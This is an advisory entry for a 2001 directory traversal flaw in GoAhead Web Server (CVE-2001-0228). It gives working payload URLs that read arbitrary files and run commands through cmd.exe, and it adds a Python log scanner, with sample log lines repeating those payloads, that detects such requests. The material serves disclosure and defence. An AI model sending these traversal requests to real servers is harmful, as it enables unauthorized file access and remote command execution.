GoAhead Web Server 2.0/2.1 - Directory Traversal
Author: Sergey Nenashev
type: remote
platform: windows
port:
date_added: 2001-02-02
date_updated: 2012-08-18
verified: 1
codes: CVE-2001-0228;OSVDB-3694
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/2334/info
A specially crafted URL composed of '..\' sequences followed by a known filename will disclose the requested file. This vulnerability also allows an attacker to execute arbitrary code with root privileges.
Gaining access to a known file:
http://target/..\..\..\..\..\..\filename
Executing arbitrary commands:
http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
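
A defender-side check for the two request shapes above, as an added example that is not part of the original advisory: it scans access-log request lines and flags any path that climbs above the web root when both '/' and '\' count as separators, as they do on Windows. It goes beyond the literal '..\' form on the page by also percent-decoding the path first (e.g. %5c); the function names, log format and log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

SEPARATORS = re.compile(r"[\\/]+")   # Windows treats both as path separators
REQUEST_LINE = re.compile(r'"(?:GET|HEAD|POST) (\S+)')

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so %5c and %255c collapse to a backslash."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_root(request_target):
    """True if the path component ever climbs above the document root."""
    path = decode_fully(request_target.split("?", 1)[0])
    depth = 0
    for segment in SEPARATORS.split(path):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:        # one more '..' than directories entered
                return True
        else:
            depth += 1
    return False

def flag_requests(log_lines):
    """Return the request targets whose paths escape the web root."""
    hits = (REQUEST_LINE.search(line) for line in log_lines)
    return [m.group(1) for m in hits if m and escapes_root(m.group(1))]

# Constructed sample log lines (common log format), not real traffic.
SAMPLE_LOG = [
    r'192.0.2.10 - - [02/Feb/2001:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    r'192.0.2.10 - - [02/Feb/2001:10:00:02 +0000] "GET /..\..\..\..\..\..\filename HTTP/1.0" 200 87',
    r'192.0.2.11 - - [02/Feb/2001:10:00:03 +0000] "GET /cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\ HTTP/1.0" 200 900',
    r'192.0.2.12 - - [02/Feb/2001:10:00:04 +0000] "GET /docs/..%5c..%5c..%5cfilename HTTP/1.0" 404 0',
    r'192.0.2.13 - - [02/Feb/2001:10:00:05 +0000] "GET /docs/../index.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("traversal:", target)
```

The same `escapes_root` test can run in a request filter in front of the server, rejecting a request before its path reaches the file system or the CGI handler.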